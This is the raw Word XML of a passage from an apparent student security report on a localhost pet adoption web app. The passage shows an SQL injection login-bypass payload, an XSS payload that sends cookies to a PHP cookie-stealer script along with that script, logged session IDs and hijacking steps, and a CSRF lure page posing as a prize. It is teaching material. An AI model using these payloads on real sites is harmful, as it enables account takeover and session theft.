          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nt takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F138862" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63CF59" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Attack Demonstrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F166891" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>5.1 SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B65759" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 1 — Access Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5341AE8C" w14:textId="03416242" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="1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Navigate to: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00773B2E" w:rsidRPr="00CE5D01">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://localhost/pet_adoption/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40A34757" w14:textId="0C88031C" w:rsidR="00773B2E" w:rsidRDefault="00773B2E">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EC1287" wp14:editId="32DCE3D7">
            <wp:extent cx="6400800" cy="3352165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WhatsApp Image 2026-07-08 at 10.12.33 PM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9868D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 2 — Enter Payload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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00162DB5" w14:paraId="6CD214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3BC469" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635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EACD49" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="026F7D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6A62EC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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61D685" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>' OR '1'='1'#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="7ADA2A0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2FED14" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6350" w:type="dxa"/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A6D8DB" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05C535F1" w14:textId="45EE2D36" w:rsidR="00773B2E" w:rsidRDefault="00773B2E" w:rsidP="00773B2E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0470AFB8" wp14:editId="77FD27D6">
            <wp:extent cx="2647399" cy="2386714"/>
            <wp:effectExtent l="0" t="0" r="63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WhatsApp Image 2026-07-08 at 10.20.04 PM.jpe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0201" cy="2425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93CD1" w14:textId="77777777" w:rsidR="00773B2E" w:rsidRDefault="00773B2E" w:rsidP="00773B2E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC9707" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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lastRenderedPageBreak/>
        <w:t>Step 3 — Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373AB279" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Successfully logged in as admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F335F3B" w14:textId="0694E02B" w:rsidR="00773B2E" w:rsidRDefault="00773B2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18687EE1" wp14:editId="46105C69">
            <wp:extent cx="6400800" cy="596709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WhatsApp Image 2026-07-08 at 10.20.27 PM.jpe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96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2F25A" w14:textId="4C38842C" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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SQL Query Analysis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162DB5" w14:paraId="0E0CBB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4F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0782C15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>-- Original Query</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3FDCC0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>SELECT * FROM users WHERE email = '$email' AND password = '$password'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6604714A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537AFEEB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>-- After Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309271D0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>SELECT * FROM users WHERE email = '' OR '1'='1'#' AND password = 'anything'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D24F660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>-- '1'='1' is always TRUE, returns admin user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="198057A4" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Output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162DB5" w14:paraId="55CDE3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4F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BAEE3C6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>LOGIN SUCCESSFUL!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6521C9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>Welcome admin! (Role: admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="569AAA68" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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lastRenderedPageBreak/>
        <w:t>5.2 XSS Cookie Stealing Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06884182" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 1 — Login (Using SQL Injection)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162DB5" w14:paraId="72D9D6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4F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445D704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>Email: ' O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R '1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76569688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>Password: anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A0E24BC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 2 — Submit XSS Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA41171" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Go to: http://localhost/pet_adoption/feedback.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E1163" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Submit in comment field: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162DB5" w14:paraId="25177E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4F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82DEE30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>&lt;script&gt;fetch("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http://localhost/cookie_stealer.php?cookie="+document.cookie)&lt;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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B40ABB2" w14:textId="60454D85" w:rsidR="00773B2E" w:rsidRDefault="00773B2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DBBDF80" wp14:editId="26C8D0CD">
            <wp:extent cx="6400800" cy="3917950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WhatsApp Image 2026-07-08 at 10.24.50 PM.jpe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1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91C32" w14:textId="7CB5F338" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 3 — Cookie Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B9277" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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The payload sends the cookie to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cookie_stealer.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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162DB5" w14:paraId="63BC56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4F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FEB313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>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C28C38F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>$cookie = $_GET['cookie'];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E30EC0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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file_put_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contents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'stolen_cookies.txt', $cookie . "\n", FILE_APPEND);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB9D8BB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>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B5D9A27" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 4 — View Stolen Cookies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162DB5" w14:paraId="0D6D78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4F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0EFAEA5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>$ cat /var/www/html/stolen_cookies.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660BE008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>[2025-01-15 07:31:42] IP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: :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:1 | Cookie: test123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709E88EA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>[2025-01-15 07:37:21] IP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: :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:1 | Cookie: PHPSESSID=e4d4231afdefafdb96f611e0bd8207b1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF77C6F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lastRenderedPageBreak/>
              <w:t>[2025-01-15 07:38:18] IP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: :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:1 | Cookie: PHPSESSID=e4d4231afdefafdb96f611e0bd8207b1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36BEEF8C" w14:textId="50E7819D" w:rsidR="00773B2E" w:rsidRDefault="00D364A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C643495" wp14:editId="5B2297D5">
            <wp:extent cx="6400800" cy="172339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WhatsApp Image 2026-07-08 at 10.26.13 PM.jpe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2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08AF9" w14:textId="51B563B5" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 5 — Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7054D7" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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1. Copy the PHPSESSID from stolen_cookies.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73828A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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2. Open browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DevTools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(F12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63B815" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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3. Go to Application → Cookies → http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599D034" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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4. Replace the PHPSESSID value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D514CF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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5. Refresh — now logged in as the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60516BFB" w14:textId="35DA990A" w:rsidR="00D364A8" w:rsidRDefault="00D364A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AF8D9E" wp14:editId="35165C2A">
            <wp:extent cx="4343400" cy="419215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WhatsApp Image 2026-07-08 at 10.28.57 PM.jpe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7726" cy="4225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DF00C" w14:textId="7BB7C9D0" w:rsidR="00D364A8" w:rsidRDefault="00D364A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A2654E" wp14:editId="4CABF3E1">
            <wp:extent cx="4600575" cy="381464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WhatsApp Image 2026-07-08 at 10.30.12 PM.jpe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0864" cy="3839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630EA" w14:textId="77777777" w:rsidR="00D364A8" w:rsidRDefault="00D364A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2565C3FC" w14:textId="5927A0D2" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>5.3 CSRF Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C6834" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 1 — Create CSRF Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D682A5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File: csrf_attack.html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162DB5" w14:paraId="6203F6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4F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85EDDBD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>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6D87C8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>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66FEE19D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>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B223BB2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&lt;title&gt;You Won a Free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Pet!&lt;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/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B58F893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&lt;style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F45023C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body {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057381AE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font-family: Arial;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B42A76F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background: linear-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gradient(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135deg, #667eea 0%, #764ba2 100%);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071E2226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display: flex;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A10B099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justify-content: center;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D53982D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align-items: center;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B01D1D5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height: 100vh;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FDBD044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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED18C27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.box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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FAB0FF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background: white;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67651827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padding: 50px;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5C7134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border-radius: 20px;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716F93FB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text-align: center;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608CF7F2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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B10F12F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button {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74014B9F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background: #00b894;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BF11C3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color: white;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D19618B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padding: 15px 40px;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C00D82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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            font-size: 20px;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD2D904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border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-radius: 10px;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16DC4F6A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cursor: pointer;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDF61A3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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B172AC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&lt;/style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7288FCC2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>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C559B3C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>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3110E8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&lt;div class="box"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34627264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&lt;h1&gt;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Congratulations!&lt;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/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCB4590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&lt;p&gt;Click below to claim your prize:&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743879FB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&lt;form action="http://localhost/pet_adoption/adopt.php" method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AC75C4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&lt;input type="hidden" name="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pet_id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" value="1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="342EA31D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&lt;input type="hidden" name="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" value="1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C34713D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&lt;button type="submit"&gt;Claim Your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Prize!&lt;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/button&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E92BF9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&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464897D8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&lt;p style="color: #ff6b6b; font-size: 12px;"&gt;CSRF Attack Demo&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F60FA3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&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC2CCB7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>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F343C8F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>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="654C67A3" w14:textId="4E75A35B" w:rsidR="00D364A8" w:rsidRDefault="00D364A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1208B21A" wp14:editId="0907B7AF">
            <wp:extent cx="3609975" cy="3691168"/>
            <wp:effectExtent l="0" t="0" r="0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WhatsApp Image 2026-07-08 at 10.31.03 PM.jpe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1763" cy="3723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5D447" w14:textId="7ECEF9A7" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 2 — Victim Visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD84C8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Victim is logged into the Pet Adoption Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DBB017" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Victim visits http://localhost/csrf_attack.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF4E7A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Victim clicks "Claim Your Prize!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C727C47" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Step 3 — Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F16A773" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An adoption request is created without the victim's knowledge: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162DB5" w14:paraId="0D7CB7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4F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322EA21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>INSERT INTO adoptions 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pet_id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, status)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VALUES (1, 1, 'pending')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741C5026" w14:textId="69CBAD08" w:rsidR="00162DB5" w:rsidRDefault="00D364A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B9F661" wp14:editId="1AE67D59">
            <wp:extent cx="6267450" cy="313372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WhatsApp Image 2026-07-08 at 10.31.21 PM.jpe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745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2EC8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BB3EB" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Security Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767230C9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>6.1 SQL Injection Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C676F3" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
